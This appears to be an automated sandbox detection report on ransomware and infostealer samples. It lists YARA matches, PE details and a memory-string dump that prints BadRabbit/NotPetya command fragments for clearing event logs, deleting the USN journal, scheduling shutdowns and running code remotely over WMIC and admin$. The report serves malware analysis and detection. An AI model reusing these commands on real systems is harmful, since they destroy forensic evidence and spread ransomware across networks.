        Source: 21.0.DCD7.tmp.7ff629520000.1.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
        Source: 13.0.Fantom.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 4.2.rundll32.exe.3363160.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 44.0.Endermanch@Petya.A.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: 44.0.Endermanch@Petya.A.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 44.0.Endermanch@Petya.A.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: 44.0.Endermanch@Petya.A.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 13.0.Fantom.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 5.2.Endermanch@Cerber5.exe.5e70000.2.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
        Source: 5.2.Endermanch@Cerber5.exe.5e70000.2.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
        Source: 4.2.rundll32.exe.32e55b8.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 4.2.rundll32.exe.32e55b8.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 4.3.rundll32.exe.3363160.2.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 5.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
        Source: 1.0.Endermanch@BadRabbit.exe.880000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 21.0.DCD7.tmp.7ff629520000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
        Source: 4.3.rundll32.exe.3363160.3.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 26.0.Endermanch@InfinityCrypt.exe.710000.0.unpack, type: UNPACKEDPEMatched rule: Detects InfinityLock ransomware Author: ditekSHen
        Source: 13.2.Fantom.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 1.2.Endermanch@BadRabbit.exe.6ffbc8.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 21.2.DCD7.tmp.7ff629520000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
        Source: 4.3.rundll32.exe.3363160.3.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 4.3.rundll32.exe.3363160.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 44.0.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: 44.0.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 44.2.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: 44.2.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 26.0.Endermanch@InfinityCrypt.exe.7131cc.1.unpack, type: UNPACKEDPEMatched rule: Detects InfinityLock ransomware Author: ditekSHen
        Source: 1.0.Endermanch@BadRabbit.exe.880000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 4.2.rundll32.exe.3363160.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 4.2.rundll32.exe.32e55b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 4.2.rundll32.exe.32e55b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 35.0.dispci.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 35.0.dispci.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: 1.2.Endermanch@BadRabbit.exe.6ffbc8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 4.3.rundll32.exe.3363160.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 44.0.Endermanch@Petya.A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: 44.0.Endermanch@Petya.A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 00000005.00000000.332123066.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
        Source: 0000002C.00000000.370824731.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 00000005.00000002.385124639.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
        Source: 00000005.00000002.390905891.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
        Source: 0000002C.00000002.555421468.000000000041A000.00000080.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 00000005.00000002.386803461.0000000001520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
        Source: 0000002C.00000000.367403583.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 0000002C.00000000.369916835.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 00000005.00000000.332507985.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
        Source: 00000005.00000000.331532732.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
        Source: 00000004.00000003.342061025.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: 00000005.00000000.329772556.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
        Source: 0000002C.00000000.368588781.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: Process Memory Space: rundll32.exe PID: 5608, type: MEMORYSTRMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
        Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: Detects InfinityLock ransomware Author: ditekSHen
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: Cerber3 Author: pekeinfo
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
        Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
        Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
        Source: Endermanch@ViraLock.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: Endermanch@PolyRansom.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: rCUUIQEQ.exe.47.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: wKAwMsck.exe.47.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeHard error raised: shutdown
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeCode function: 1_2_008838401_2_00883840
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeCode function: 1_2_0088201D1_2_0088201D
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeCode function: 1_2_008830E31_2_008830E3
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeCode function: 1_2_0088173C1_2_0088173C
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00415E7C3_2_00415E7C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4A83C4_2_04A4A83C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4C1E34_2_04A4C1E3
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A427084_2_04A42708
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4B11D4_2_04A4B11D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4C9404_2_04A4C940
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A49B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,4_2_04A49B63
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeSection loaded: mscorjit.dll
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A49534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,4_2_04A49534
        Source: 4W5dQXszUV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: 1.2.Endermanch@BadRabbit.exe.880000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.rundll32.exe.3363160.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 4.3.rundll32.exe.3363160.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 44.2.Endermanch@Petya.A.exe.4e0000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Petya tc_detection_name = Petya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
        Source: 13.0.Fantom.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 44.2.Endermanch@Petya.A.exe.41b363.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Petya tc_detection_name = Petya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
        Source: 5.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 13.0.Fantom.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 21.0.DCD7.tmp.7ff629520000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.0.DCD7.tmp.7ff629520000.2.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 5.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 1.0.Endermanch@BadRabbit.exe.880000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 1.0.Endermanch@BadRabbit.exe.880000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.rundll32.exe.3363160.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 5.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 5.2.Endermanch@Cerber5.exe.1520000.1.raw.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 5.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 5.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 21.0.DCD7.tmp.7ff629520000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.0.DCD7.tmp.7ff629520000.1.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 13.0.Fantom.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 4.2.rundll32.exe.3363160.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 44.0.Endermanch@Petya.A.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: 44.0.Endermanch@Petya.A.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 44.0.Endermanch@Petya.A.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: 44.0.Endermanch@Petya.A.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 13.0.Fantom.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 5.2.Endermanch@Cerber5.exe.5e70000.2.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 5.2.Endermanch@Cerber5.exe.5e70000.2.raw.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 4.2.rundll32.exe.32e55b8.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.rundll32.exe.32e55b8.0.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.rundll32.exe.3363160.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 5.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 1.0.Endermanch@BadRabbit.exe.880000.3.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.0.DCD7.tmp.7ff629520000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.0.DCD7.tmp.7ff629520000.0.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 4.3.rundll32.exe.3363160.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 26.0.Endermanch@InfinityCrypt.exe.710000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
        Source: 13.2.Fantom.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 1.2.Endermanch@BadRabbit.exe.6ffbc8.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
